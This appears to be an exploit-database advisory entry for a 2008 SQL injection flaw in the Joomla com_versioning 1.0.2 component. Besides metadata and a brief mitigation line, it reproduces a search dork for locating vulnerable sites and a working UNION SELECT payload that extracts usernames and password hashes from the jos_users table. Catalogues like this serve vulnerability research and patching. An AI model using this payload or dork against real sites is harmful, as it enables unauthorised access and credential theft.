Joomla Component com_versioning (id) Remote Sql Injection Vulnerability

vendor:

Versioning

by:

SpK & His0k4

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Versioning

Affected Version From: 1.0.2

Affected Version To: 1.0.2

Patch Exists: YES

Related CWE: N/A

CPE: a:joomprod:versioning

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Joomla Component com_versioning (id) Remote Sql Injection Vulnerability

A vulnerability in the Joomla Component com_versioning (id) allows an attacker to inject arbitrary SQL commands via the 'id' parameter in a 'index.php?option=com_versioning&task=edit&id=' request. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. The vulnerability is confirmed in version 1.0.2. Other versions may also be affected.

Mitigation:

Input validation should be used to prevent SQL injection attacks.

Source

Exploit-DB raw data:

[+] Name    : Joomla Component com_versioning (id) Remote Sql Injection Vulnerability

[+] Team           : DarkMatter Crew

[+] Crew website       : WwW.SykoPainKilla.CoM

[+] Author         : SpK & His0k4

[+] Contact        : fatal.1.ty[at]hotmail.com[dot]com

[+] D0rk      : inurl:index.php?option=com_versioning



[+] Expl0iT :

http://sykopainkilla.com/index.php?option=com_versioning&task=edit&id=-83 UNION SELECT 1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 FROM jos_users--


#
#
#
#
############################################
                                           #
Visit our website www.sykopainkilla.com    #
                                           #
                                           #
#DarmMatter & SpK F0R3V3R                  #
                                           #
############################################
#
#
#
#


side note:
<name>versioning</name>
<creationDate>11.14.2006</creationDate>
<author>Thomas Papin</author>
<copyright>
This component is released under the GNU/GPL License.
</copyright>
<authorEmail>thomas.papin@free.fr</authorEmail>
<authorUrl>www.joomprod.com</authorUrl>
<version>1.0.2</version>

# milw0rm.com [2008-07-01]